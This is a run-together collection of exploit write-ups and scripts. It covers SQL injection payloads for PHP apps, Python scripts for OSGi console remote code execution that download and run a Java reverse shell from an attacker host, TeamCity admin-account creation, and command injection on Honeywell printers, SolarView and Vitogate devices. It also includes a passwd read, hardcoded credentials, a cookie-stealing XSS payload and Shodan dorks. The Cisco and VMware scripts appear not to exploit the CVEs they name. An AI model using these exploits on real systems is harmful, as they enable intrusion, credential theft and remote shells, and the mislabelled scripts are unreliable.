# Exploit Title: Human Resource Management System - SQL Injection # Date: 13-01-2024 # Exploit Author: Srikar ( Exp1o1t9r ) # Vendor Homepage: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html # Software Link: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html # https://www.sourcecodester.com/sites/default/files/download/oretnom23/hrm.zip # Version: 1.0 (Monday, October 10, 2022 - 13:37) # Tested On: Windows 10 Pro 10.0.19044 N/A Build 1288 + XAMPP V3.3.0 # Vulnerable URL and Parameter:URL: Parameter: employeeid=2 The following payloads successfully identified SQL injection vulnerabilities: employeeid=2' AND 9667=9667-- NFMgemployeeid=2' AND (SELECT 6014 FROM(SELECT COUNT(*),CONCAT(0x716a767671,(SELECT (ELT(6014=6014,1))),0x7162716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ywfiemployeeid=2' AND (SELECT 7160 FROM (SELECT(SLEEP([SLEEPTIME])))IzXD)-- ninWemployeeid=-4254' UNION ALL SELECT NULL,CONCAT(0x716a767671,0x457977584e79636568687641497a4b6e637668455a487948534e50737753626f5a4a545244616276,0x7162716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - * # Response:MySQL: 10.4.32-MariaDB Users:'pma'@'localhost''root'@'127.0.0.1''root'@'::1''root'@'localhost'*

#!/usr/bin/python # Exploit Title: [OSGi v3.8-3.18 Console RCE] # Date: [2023-07-28] # Exploit Author: [Andrzej Olchawa, Milenko Starcik, # VisionSpace Technologies GmbH] # Exploit Repository: # [https://github.com/visionspacetec/offsec-osgi-exploits.git] # Vendor Homepage: [https://eclipse.dev/equinox] # Software Link: [https://archive.eclipse.org/equinox/] # Version: [3.8 - 3.18] # Tested on: [Linux kali 6.3.0-kali1-amd64] # License: [MIT] # # Usage: # python exploit.py --help # # Example: # python exploit.py --rhost=192.168.0.133 --rport=1337 --lhost=192.168.0.100 \ # --lport=4444 """ This is an exploit that allows to open a reverse shell connection from the system running OSGi v3.8-3.18 and earlier. """ import argparse import socket import sys import threading from functools import partial from http.server import BaseHTTPRequestHandler, HTTPServer # Stage 1 of the handshake message HANDSHAKE_STAGE_1 = \ b"\xff\xfd\x01\xff\xfd" \ b"\x03\xff\xfb\x1f\xff" \ b"\xfa\x1f\x00\x74\x00" \ b"\x37\xff\xf0\xff\xfb" \ b"\x18" # Stage 2 of the handshake message HANDSHAKE_STAGE_2 = \ b"\xff\xfa\x18\x00\x58" \ b"\x54\x45\x52\x4d\x2d" \ b"\x32\x35\x36\x43\x4f" \ b"\x4c\x4f\x52\xff\xf0" # The buffer of this size is enough to handle the telnet handshake BUFFER_SIZE = 2 * 1024 class HandlerClass(BaseHTTPRequestHandler): """ This class overrides the BaseHTTPRequestHandler. It provides a specific functionality used to deliver a payload to the target host. """ _lhost: str _lport: int def __init__(self, lhost, lport, *args, **kwargs): self._lhost = lhost self._lport = lport super().__init__(*args, **kwargs) def _set_response(self): self.send_response(200) self.send_header("Content-type", "text/html") self.end_headers() def do_GET(self): # pylint: disable=C0103 """ This method is responsible for the playload delivery. """ print("Delivering the payload...") self._set_response() self.wfile.write(generate_revshell_payload( self._lhost, self._lport).encode('utf-8')) raise KeyboardInterrupt def log_message(self, format, *args): # pylint: disable=W0622 """ This method redefines a built-in method to suppress BaseHTTPRequestHandler log messages. """ return def generate_revshell_payload(lhost, lport): """ This function generates the Revershe Shell payload that will be executed on the target host. """ payload = \ "import java.io.IOException;import java.io.InputStream;" \ "import java.io.OutputStream;import java.net.Socket;" \ "class RevShell {public static void main(String[] args) " \ "throws Exception { String host=\"%s\";int port=%d;" \ "String cmd=\"sh\";Process p=new ProcessBuilder(cmd)." \ "redirectErrorStream(true).start();Socket s=new Socket(host,port);" \ "InputStream pi=p.getInputStream(),pe=p.getErrorStream(), " \ "si=s.getInputStream();OutputStream po=p.getOutputStream()," \ "so=s.getOutputStream();while(!s.isClosed()){while(pi.available()" \ ">0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());" \ "while(si.available()>0)po.write(si.read());so.flush();po.flush();" \ "Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};" \ "p.destroy();s.close();}}\n" % ( lhost, lport) return payload def run_payload_delivery(lhost, lport): """ This function is responsible for payload delivery. """ print("Setting up the HTTP server for payload delivery...") handler_class = partial(HandlerClass, lhost, lport) server_address = ('', 80) httpd = HTTPServer(server_address, handler_class) try: print("[+] HTTP server is running.") httpd.serve_forever() except KeyboardInterrupt: print("[+] Payload delivered.") except Exception as err: # pylint: disable=broad-except print("[-] Failed payload delivery!") print(err) finally: httpd.server_close() def generate_stage_1(lhost): """ This function generates the stage 1 of the payload. """ stage_1 = b"fork \"curl http://%s -o ./RevShell.java\"\n" % ( lhost.encode() ) return stage_1 def generate_stage_2(): """ This function generates the stage 2 of the payload. """ stage_2 = b"fork \"java ./RevShell.java\"\n" return stage_2 def establish_connection(rhost, rport): """ This function creates a socket and establishes the connection to the target host. """ print("[*] Connecting to OSGi Console...") sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((rhost, rport)) print("[+] Connected.") return sock def process_handshake(sock): """ This function process the handshake with the target host. """ print("[*] Processing the handshake...") sock.recv(BUFFER_SIZE) sock.send(HANDSHAKE_STAGE_1) sock.recv(BUFFER_SIZE) sock.send(HANDSHAKE_STAGE_2) sock.recv(BUFFER_SIZE) sock.recv(BUFFER_SIZE) def deliver_payload(sock, lhost): """ This function executes the first stage of the exploitation. It triggers the payload delivery mechanism to the target host. """ stage_1 = generate_stage_1(lhost) print("[*] Triggering the payload delivery...") sock.send(stage_1) sock.recv(BUFFER_SIZE) sock.recv(BUFFER_SIZE) def execute_payload(sock): """ This function executes the second stage of the exploitation. It sends payload which is responsible for code execution. """ stage_2 = generate_stage_2() print("[*] Executing the payload...") sock.send(stage_2) sock.recv(BUFFER_SIZE) sock.recv(BUFFER_SIZE) print("[+] Payload executed.") def exploit(args, thread): """ This function sends the multistaged payload to the tareget host. """ try: sock = establish_connection(args.rhost, args.rport) process_handshake(sock) deliver_payload(sock, args.lhost) # Join the thread running the HTTP server # and wait for payload delivery thread.join() execute_payload(sock) sock.close() print("[+] Done.") except socket.error as err: print("[-] Could not connect!") print(err) sys.exit() def parse(): """ This fnction is used to parse and return command-line arguments. """ parser = argparse.ArgumentParser( prog="OSGi-3.8-console-RCE", description="This tool will let you open a reverse shell from the " "system that is running OSGi with the '-console' " "option in versions between 3.8 and 3.18.", epilog="Happy Hacking! :)", ) parser.add_argument("--rhost", dest="rhost", help="remote host", type=str, required=True) parser.add_argument("--rport", dest="rport", help="remote port", type=int, required=True) parser.add_argument("--lhost", dest="lhost", help="local host", type=str, required=False) parser.add_argument("--lport", dest="lport", help="local port", type=int, required=False) parser.add_argument("--version", action="version", version="%(prog)s 0.1.0") return parser.parse_args() def main(args): """ Main fuction. """ thread = threading.Thread( target=run_payload_delivery, args=(args.lhost, args.lport)) thread.start() exploit(args, thread) if __name__ == "__main__": main(parse())

+ **Exploit Title:** CVE-2023-7137_Client_Details_System-SQL_Injection_1 + **Date:** 2023-26-12 + **Exploit Author:** Hamdi Sevben + **Vendor Homepage:** https://code-projects.org/client-details-system-in-php-with-source-code/ + **Software Link:** https://download-media.code-projects.org/2020/01/CLIENT_DETAILS_SYSTEM_IN_PHP_WITH_SOURCE_CODE.zip + **Version:** 1.0 + **Tested on:** Windows 10 Pro + PHP 8.1.6, Apache 2.4.53 + **CVE:** CVE-2023-7137 ## References: + **CVE-2023-7137:** https://vuldb.com/?id.249140 + https://www.cve.org/CVERecord?id=CVE-2023-7137 + https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-7137 + https://nvd.nist.gov/vuln/detail/CVE-2023-7137 ## Description: Client Details System 1.0 allows SQL Injection via parameter 'uemail' in "/clientdetails/". Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latest vulnerabilities in the underlying database. ## Proof of Concept: + Go to the User Login page: "http://localhost/clientdetails/" + Fill email and password. + Intercept the request via Burp Suite and send to Repeater. + Copy and paste the request to a "r.txt" file. + Captured Burp request: ``` POST /clientdetails/ HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-us,en;q=0.5 Cache-Control: no-cache Content-Length: 317 Content-Type: application/x-www-form-urlencoded Referer: http://localhost/clientdetails/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36 [email protected]&login=LOG+IN&password=P@ass123 ``` + Use sqlmap to exploit. In sqlmap, use 'uemail' parameter to dump the database. ``` python sqlmap.py -r r.txt -p uemail --risk 3 --level 5 --threads 1 --random-agent tamper=between,randomcase --proxy="http://127.0.0.1:8080" --dbms mysql --batch --current-db ``` ``` --- Parameter: uemail (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: [email protected]' OR NOT 6660=6660-- FlRf&login=LOG IN&password=P@ass123 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: [email protected]' AND (SELECT 6854 FROM(SELECT COUNT(*),CONCAT(0x717a717a71,(SELECT (ELT(6854=6854,1))),0x7176627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Oxlo&login=LOG IN&password=P@ass123 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: [email protected]' AND (SELECT 5335 FROM (SELECT(SLEEP(5)))qsPA)-- pwtE&login=LOG IN&password=P@ass123 Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: [email protected]' UNION ALL SELECT NULL,CONCAT(0x717a717a71,0x45575259495444506f48756469467471555975554d6f794d77677a4f50547145735052567278434f,0x7176627871),NULL,NULL,NULL,NULL,NULL-- -&login=LOG IN&password=P@ass123 --- [14:58:11] [INFO] the back-end DBMS is MySQL web application technology: Apache 2.4.53, PHP, PHP 8.1.6 back-end DBMS: MySQL >= 5.0 (MariaDB fork) [14:58:11] [INFO] fetching current database current database: 'loginsystem' ``` + current database: `loginsystem` 

#!/usr/bin/python # Exploit Title: [OSGi v3.7.2 Console RCE] # Date: [2023-07-28] # Exploit Author: [Andrzej Olchawa, Milenko Starcik, # VisionSpace Technologies GmbH] # Exploit Repository: # [https://github.com/visionspacetec/offsec-osgi-exploits.git] # Vendor Homepage: [https://eclipse.dev/equinox] # Software Link: [https://archive.eclipse.org/equinox/] # Version: [3.7.2 and before] # Tested on: [Linux kali 6.3.0-kali1-amd64] # License: [MIT] # # Usage: # python exploit.py --help # # Examples: # python exploit.py --rhost=localhost --rport=1337 --lhost=localhost \ # --lport=4444 # # python exploit.py --rhost=localhost --rport=1337 --payload= \ # "curl http://192.168.100.100/osgi_test" """ This is an exploit that allows to open a reverse shell connection from the system running OSGi v3.7.2 and earlier. """ import argparse import base64 import socket def parse(): """ This fnction is used to parse and return command-line arguments. """ parser = argparse.ArgumentParser( prog="OSGi-3.7.2-console-RCE", description="This tool will let you open a reverse shell from the " "system that is running OSGi with the '-console' " "option in version 3.7.2 (or before).", epilog="Happy Hacking! :)", ) parser.add_argument("--rhost", dest="rhost", help="remote host", type=str, required=True) parser.add_argument("--rport", dest="rport", help="remote port", type=int, required=True) parser.add_argument("--lhost", dest="lhost", help="local host", type=str, required=False) parser.add_argument("--lport", dest="lport", help="local port", type=int, required=False) parser.add_argument("--payload", dest="custom_payload", help="custom payload", type=str, required=False) parser.add_argument("--version", action="version", version="%(prog)s 0.1.0") args = parser.parse_args() if args.custom_payload and (args.lhost or args.lport): parser.error( "either --payload or both --lport and --rport are required.") return args def generate_payload(lhost, lport, custom_payload): """ This function generates the whole payload ready for the delivery. """ payload = "" if custom_payload: payload = custom_payload print("(*) Using custom payload.") elif lhost and lport: payload = \ "echo 'import java.io.IOException;import java.io.InputStream;" \ "import java.io.OutputStream;import java.net.Socket;class Rev" \ "Shell {public static void main(String[] args) throws Excepti" \ "on { String host=\"%s\";int port=%s;String cmd=\"sh\";Proces" \ "s p=new ProcessBuilder(cmd).redirectErrorStream(true).start(" \ ");Socket s=new Socket(host,port);InputStream pi=p.getInputSt" \ "ream(),pe=p.getErrorStream(), si=s.getInputStream();OutputSt" \ "ream po=p.getOutputStream(), so=s.getOutputStream();while(!s" \ ".isClosed()){while(pi.available()>0)so.write(pi.read());whil" \ "e(pe.available()>0)so.write(pe.read());while(si.available()>" \ "0)po.write(si.read());so.flush();po.flush();Thread.sleep(50)" \ ";try {p.exitValue();break;}catch (Exception e){}};p.destroy(" \ ");s.close();}}' > RevShell.java ; java ./RevShell.java" % ( lhost, lport) print("(+) Using Java reverse shell payload.") bash_payload = b"bash -c {echo,%s}|{base64,-d}|{bash,-i}" % ( base64.b64encode(payload.encode())) wrapped_payload = b"fork \"%s\"\n" % (bash_payload) return wrapped_payload def deliver_payload(rhost, rport, payload): """ This function connects to the target host and delivers the payload. It returns True if successful; False otherwise. """ print("(*) Sending payload...") try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((rhost, rport)) sock.send(payload) sock.close() except socket.error as err: print(f"(-) Could not deliver the payload to {rhost}:{rport}!") print(err) return False return True def main(args): """ Main function. """ payload = generate_payload(args.lhost, args.lport, args.custom_payload) success = deliver_payload(args.rhost, args.rport, payload) if success: print("(+) Done.") else: print("(-) Finished with errors.") if __name__ == "__main__": main(parse())

# Exploit Title: [Cisco Firepower Management Center] # Google Dork: [non] # Date: [12/06/2023] # Exploit Author: [Abdualhadi khalifa](https://twitter.com/absholi_ly) # Version: [6.2.3.18", "6.4.0.16", "6.6.7.1] # CVE : [CVE-2023-20048] import requests import json # set the variables for the URL, username, and password for the FMC web services interface fmc_url = "https://fmc.example.com" fmc_user = "admin" fmc_pass = "cisco123" # create a requests session to handle cookies and certificate verification session = requests.Session() session.verify = False # send a POST request to the /api/fmc_platform/v1/auth/generatetoken endpoint to get the access token and refresh token token_url = fmc_url + "/api/fmc_platform/v1/auth/generatetoken" response = session.post(token_url, auth=(fmc_user, fmc_pass)) # check the response status and extract the access token and refresh token from the response headers # set the access token as the authorization header for the subsequent requests try: if response.status_code == 200: access_token = response.headers["X-auth-access-token"] refresh_token = response.headers["X-auth-refresh-token"] session.headers["Authorization"] = access_token else: print("Failed to get tokens, status code: " + str(response.status_code)) exit() except Exception as e: print(e) exit() # set the variable for the domain id # change this to your domain id domain_id = "e276abec-e0f2-11e3-8169-6d9ed49b625f" # send a GET request to the /api/fmc_config/v1/domain/{DOMAIN_UUID}/devices/devicerecords endpoint to get the list of devices managed by FMC devices_url = fmc_url + "/api/fmc_config/v1/domain/" + domain_id + "/devices/devicerecords" response = session.get(devices_url) # check the response status and extract the data as a json object try: if response.status_code == 200: data = response.json() else: print("Failed to get devices, status code: " + str(response.status_code)) exit() except Exception as e: print(e) exit() # parse the data to get the list of device names and URLs devices = [] for item in data["items"]: device_name = item["name"] device_url = item["links"]["self"] devices.append((device_name, device_url)) # loop through the list of devices and send a GET request to the URL of each device to get the device details for device in devices: device_name, device_url = device response = session.get(device_url) # check the response status and extract the data as a json object try: if response.status_code == 200: data = response.json() else: print("Failed to get device details, status code: " + str(response.status_code)) continue except Exception as e: print(e) continue # parse the data to get the device type, software version, and configuration URL device_type = data["type"] device_version = data["metadata"]["softwareVersion"] config_url = data["metadata"]["configURL"] # check if the device type is FTD and the software version is vulnerable to the CVE-2023-20048 vulnerability # use the values from the affected products section in the security advisory if device_type == "FTD" and device_version in ["6.2.3.18", "6.4.0.16", "6.6.7.1"]: print("Device " + device_name + " is vulnerable to CVE-2023-20048") # create a list of commands that you want to execute on the device commands = ["show version", "show running-config", "show interfaces"] device_id = device_url.split("/")[-1] # loop through the list of commands and send a POST request to the /api/fmc_config/v1/domain/{DOMAIN_UUID}/devices/devicerecords/{DEVICE_ID}/operational/command/{COMMAND} endpoint to execute each command on the device # replace {DOMAIN_UUID} with your domain id, {DEVICE_ID} with your device id, and {COMMAND} with the command you want to execute for command in commands: command_url = fmc_url + "/api/fmc_config/v1/domain/" + domain_id + "/devices/devicerecords/" + device_id + "/operational/command/" + command response = session.post(command_url) # check the response status and extract the data as a json object try: if response.status_code == 200: data = response.json() else: print("Failed to execute command, status code: " + str(response.status_code)) continue except Exception as e: print(e) continue # parse the data to get the result of the command execution and print it result = data["result"] print("Command: " + command) print("Result: " + result) else: print("Device " + device_name + " is not vulnerable to CVE-2023-20048")

# Exploit Title: [VMware Cloud Director | Bypass identity verification] # Google Dork: [non] # Date: [12/06/2023] # Exploit Author: [Abdualhadi khalifa](https://twitter.com/absholi_ly) # Version: [10.5] # CVE : [CVE-2023-34060] import requests import paramiko import subprocess import socket import argparse import threading # Define a function to check if a port is open def is_port_open(ip, port): # Create a socket object s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Set the timeout to 1 second s.settimeout(1) # Try to connect to the port try: s.connect((ip, port)) # The port is open return True except: # The port is closed return False finally: # Close the socket s.close() # Define a function to exploit a vulnerable device def exploit_device(ip, port, username, password, command): # Create a ssh client object client = paramiko.SSHClient() # Set the policy to accept any host key client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) # Connect to the target using the credentials client.connect(ip, port, "root", "vmware", allow_agent=False, look_for_keys=False) # Execute the command and get the output stdin, stdout, stderr = client.exec_command(command) # Print the output print(f"The output of the command {command} on the device {ip}:{port} is: {stdout.read().decode()}") # Close the ssh connection client.close() # Parse the arguments from the user parser = argparse.ArgumentParser(description="A Python program to detect and exploit the CVE-2023-34060 vulnerability in VMware Cloud Director") parser.add_argument("ip", help="The target IP address") parser.add_argument("-p", "--ports", nargs="+", type=int, default=[22, 5480], help="The target ports to check") parser.add_argument("-u", "--username", default="root", help="The username for ssh") parser.add_argument("-w", "--password", default="vmware", help="The password for ssh") parser.add_argument("-c", "--command", default="hostname", help="The command to execute on the vulnerable devices") args = parser.parse_args() # Loop through the ports and check for the vulnerability for port in args.ports: # Check if the port is open if is_port_open(args.ip, port): # The port is open, send a GET request to the port and check the status code response = requests.get(f"http://{args.ip}:{port}") if response.status_code == 200: # The port is open and vulnerable print(f"Port {port} is vulnerable to CVE-2023-34060") # Create a thread to exploit the device thread = threading.Thread(target=exploit_device, args=(args.ip, port, args.username, args.password, args.command)) # Start the thread thread.start() else: # The port is open but not vulnerable print(f"Port {port} is not vulnerable to CVE-2023-34060") else: # The port is closed print(f"Port {port} is closed")

Exploit Title: SnipeIT 6.2.1 - Stored Cross Site Scripting Date: 06-Oct-2023 Exploit Author: Shahzaib Ali Khan Vendor Homepage: https://snipeitapp.com Software Link: https://github.com/snipe/snipe-it/releases/tag/v6.2.1 Version: 6.2.1 Tested on: Windows 11 22H2 and Ubuntu 20.04 CVE: CVE-2023-5452 Description: SnipeIT 6.2.1 is affected by a stored cross-site scripting (XSS) feature that allows attackers to execute JavaScript commands. The location endpoint was vulnerable. Steps to Reproduce: 1. Login as a standard user [non-admin] > Asset page > List All 2. Click to open any asset > Edit Asset 3. Create new location and add the payload: <script>alert(document.cookie)</script> 4. Now login to any other non-admin or admin > Asset page > List All 5. Open the same asset of which you can change the location and the payload will get executed. POC Request: POST /api/v1/locations HTTP/1.1 Host: localhost Content-Length: 118 Accept: */* X-CSRF-TOKEN: CDJkvGNWzFKFueeNx0AQMJIhhXJGZmKG1SFeVEGV X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.63 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://localhost Referer: http://localhost/hardware/196/edit Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: snipeit_session=AHw3ARN6pdg90xU4ovG1FBZywycKPLIxjTUfmELO; assetsListingTable.bs.table.cardView=false; laravel_token= eyJpdiI6IitpM1RXVEVEVGNLZzRTd28wYmhZblE9PSIsInZhbHVlIjoickJocmNYTzNOS3JYdkdhSmpJME1GRmJYMi9DUnVkaStDTzBnbHZDVG1xNVAvbTA5cjJHM1FTbi95SEVzNmNnNzdKNHY5em5pK3 ZjQ2F3VnB6RnhJRCs4NkV6NW16RnRWb3M0cXBuT2ZpZExoQ3JrN1VIVHB3cWV5NUtBRWZ4OXBsdEx4R0hSeElLV1BEbWk2WGxiWEBOMDg5cGFySj1rSnENckx3bXg2Qi9KQzFvNGJJTktjTVUw0EI4YVNM d2UxdW1TelBDV1ByUk9yeTFOUDR1cS9SV2tFRi9LOG1iZGVweUxJdGhHTXRLSnFvTU82QVIvREphS215bkRtKzM5M1RVQ21nVENsT1M1Mn1FUT1TbFkOVDVPbHd4a3BFQW1YQkY3NFR2bzRQSGZIelppa0 01MGYvSmFrbXVGWHpV0FMiLCJtYWMi0iJjZjMwMmQ4ZTB1NmM4MDU5YzU4MTYzZTgxNTcx0WEwYmM2Y2EyMmRlYzZhMmE2ZjI1NzIxYjc4NmIxNjRiOWM5IiwidGFnIjoiIn0%3D; XSRF-TOKEN= eyJpdiI6IjNmMVpNUEpDNCtpV0pHKOczZDRSUmc9PSIsInZhbHVlIjoiWXYvZkY2bTk4MONsUUFZQjZiVWtPdm1JRE1WWmpBd2tsZWNJblgxZWg3dONYL2x0Zkxib3N5Y1N5YmRYVm1XUm91N3pES1F1bH FWMEV1Y2xsZ1VqZ1FYdmdYcjJRZXZMZG9NYmpWY2htL2tPdXNBQUdEbjVHSEVjV2tzKOpYelEiLCJtYWMi0iI1YzhkNmQ2NDAxNmZkYTQ1NzVhZmI5OGY3ODA3MDkOOTc4ZWVhYmMiZWIYMjZhZGZiZWI5 MjMOMGJjZDBkNzU4IiwidGFnIjoiIn0%3D Connection: close name=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&city=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&country= Thanks, Shahzaib Ali Khan

#- Exploit Title: JetBrains TeamCity 2023.05.3 - Remote Code Execution (RCE) #- Shodan Dork: http.title:TeamCity , http.favicon.hash:-1944119648 #- Exploit Author: ByteHunter #- Vendor: JetBrains #- Email: [email protected] #- vendor: JetBrains #- Version: versions before 2023.05.4 #- Tested on: 2023.05.3 #- CVE : CVE-2023-42793 import requests import argparse import re import random import string import subprocess banner = """ ===================================================== * CVE-2023-42793 * * TeamCity Admin Account Creation * * * * Author: ByteHunter * ===================================================== """ print(banner) parser = argparse.ArgumentParser(description="CVE-2023-42793 - TeamCity JetBrains PoC") parser.add_argument("-u", "--url", required=True, help="Target URL") parser.add_argument("-v", "--verbose", action="store_true", help="verbose mode") args = parser.parse_args() url = args.url if url.startswith("https://"): curl_command = "curl -k" else: curl_command = "curl" get_token_url = f"{url}/app/rest/users/id:1/tokens/RPC2" delete_token_url = f"{url}/app/rest/users/id:1/tokens/RPC2" create_user_url = f"{url}/app/rest/users" create_user_command = "" token = "" response = requests.post(get_token_url, verify=False) if response.status_code == 200: match = re.search(r'value="([^"]+)"', response.text) if match: token = match.group(1) print(f"Token: {token}") else: print("Token not found in the response") elif response.status_code == 404: print("Token already exists") delete_command = f'{curl_command} -X DELETE {delete_token_url}' delete_process = subprocess.Popen(delete_command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) delete_process.wait() delete_output = delete_process.communicate() if delete_process.returncode == 0: print("Previous token deleted successfully\nrun this command again for creating new token & admin user.") else: print("Failed to delete the previous token") elif response.status_code == 400: print("Token already exists") delete_command = f'{curl_command} -X DELETE {delete_token_url}' delete_process = subprocess.Popen(delete_command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) delete_process.wait() delete_output = delete_process.communicate() if delete_process.returncode == 0: print("Previous token deleted successfully\nrun this command again for creating new token & admin user.") else: print("Failed to delete the previous token") else: print("Failed to get a token") if token: headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json" } random_chars = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(4)) username = f"city_admin{random_chars}" data = { "username": username, "password": "Main_password!!**", "email": "[email protected]", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]} } create_user_command = f'{curl_command} --path-as-is -H "Authorization: Bearer {token}" -X POST {create_user_url} -H "Content-Type: application/json" --data \'{{"username": "{username}", "password": "theSecretPass!", "email": "nest@nest", "roles": {{"role": [{{"roleId": "SYSTEM_ADMIN", "scope": "g"}}]}}}}\'' create_user_response = requests.post(create_user_url, headers=headers, json=data) if create_user_response.status_code == 200: print("Successfully exploited!") print(f"URL: {url}") print(f"Username: {username}") print("Password: Main_password!!**") else: print("Failed to create new admin user") if args.verbose: if response.status_code == 400: pass else: print(f"Final curl command: {create_user_command}")

#- Exploit Title: Honeywell PM43 < P10.19.050004 - Remote Code Execution (RCE) #- Shodan Dork: http.title:PM43 , PM43 #- Exploit Author: ByteHunter #- Email: [email protected] #- Frimware Version: versions prior to P10.19.050004 #- Tested on: P10.17.019667 #- CVE : CVE-2023-3710 import requests import argparse BLUE = '\033[94m' YELLOW = '\033[93m' RESET = '\033[0m' def banner(): banner = """ ╔════════════════════════════════════════════════╗ CVE-2023-3710 Command Injection in Honeywell PM43 Printers Author: ByteHunter ╚════════════════════════════════════════════════╝ """ print(YELLOW + banner + RESET) def run_command(url, command): full_url = f"{url}/loadfile.lp?pageid=Configure" payload = { 'username': f'hunt\n{command}\n', 'userpassword': 'admin12345admin!!' } try: response = requests.post(full_url, data=payload, verify=False) response_text = response.text html_start_index = response_text.find('<html>') if html_start_index != -1: return response_text[:html_start_index] else: return response_text except requests.exceptions.RequestException as e: return f"Error: {e}" def main(): parser = argparse.ArgumentParser(description='Command Injection PoC for Honeywell PM43 Printers') parser.add_argument('--url', dest='url', help='Target URL', required=True) parser.add_argument('--run', dest='command', help='Command to execute', required=True) args = parser.parse_args() response = run_command(args.url, args.command) print(f"{BLUE}{response}{RESET}") if __name__ == "__main__": banner() main()

#- Exploit Title: SolarView Compact 6.00 - Command Injection #- Shodan Dork: http.html:"solarview compact" #- Exploit Author: ByteHunter #- Email: [email protected] #- Version: 6.00 #- Tested on: 6.00 #- CVE : CVE-2023-23333 import argparse import requests def vuln_check(ip_address, port): url = f"http://{ip_address}:{port}/downloader.php?file=;echo%20Y2F0IC9ldGMvcGFzc3dkCg%3D%3D|base64%20-d|bash%00.zip" response = requests.get(url) if response.status_code == 200: output = response.text if "root" in output: print("Vulnerability detected: Command Injection possible.") print(f"passwd file content:\n{response.text}") else: print("No vulnerability detected.") else: print("Error: Unable to fetch response.") def main(): parser = argparse.ArgumentParser(description="SolarView Compact Command Injection ") parser.add_argument("-i", "--ip", help="IP address of the target device", required=True) parser.add_argument("-p", "--port", help="Port of the the target device (default: 80)", default=80, type=int) args = parser.parse_args() ip_address = args.ip port = args.port vuln_check(ip_address, port) if __name__ == "__main__": main()

#- Exploit Title: Viessmann Vitogate 300 <= 2.1.3.0 - Remote Code Execution (RCE) #- Shodan Dork: http.title:'Vitogate 300' #- Exploit Author: ByteHunter #- Email: [email protected] #- Version: versions up to 2.1.3.0 #- Tested on: 2.1.1.0 #- CVE : CVE-2023-5702 & CVE-2023-5222 import argparse import requests def banner(): banner = """ ╔═══════════════════════════════════╗ CVE-2023-5702 Vitogate 300 RCE Author: ByteHunter ╚═══════════════════════════════════╝ """ print(banner) def send_post_request(target_ip, command, target_port): payload = { "method": "put", "form": "form-4-7", "session": "", "params": { "ipaddr": f"1;{command}" } } headers = { "Host": target_ip, "Content-Length": str(len(str(payload))), "Content-Type": "application/json" } url = f"http://{target_ip}:{target_port}/cgi-bin/vitogate.cgi" response = requests.post(url, json=payload, headers=headers) if response.status_code == 200: print("Result:") print(response.text) else: print(f"Request failed! status code: {response.status_code}") def main(): parser = argparse.ArgumentParser(description="Vitogate 300 RCE & Hardcoded Credentials") parser.add_argument("--target", required=False, help="Target IP address") parser.add_argument("--port", required=False, help="Target port",default="80") parser.add_argument("--command", required=False, help="Command") parser.add_argument("--creds", action="store_true", help="Show hardcoded credentials") args = parser.parse_args() if args.creds: print("Vitogate 300 hardcoded administrative accounts credentials") print("Username: vitomaster, Password: viessmann1917") print("Username: vitogate, Password: viessmann") else: target_ip = args.target target_port = args.port command = args.command if not (target_ip and command): print("Both --target and --command options are required.\nor use --creds option to see hardcoded Credentials.") return send_post_request(target_ip, command,target_port) if __name__ == "__main__": banner() main()

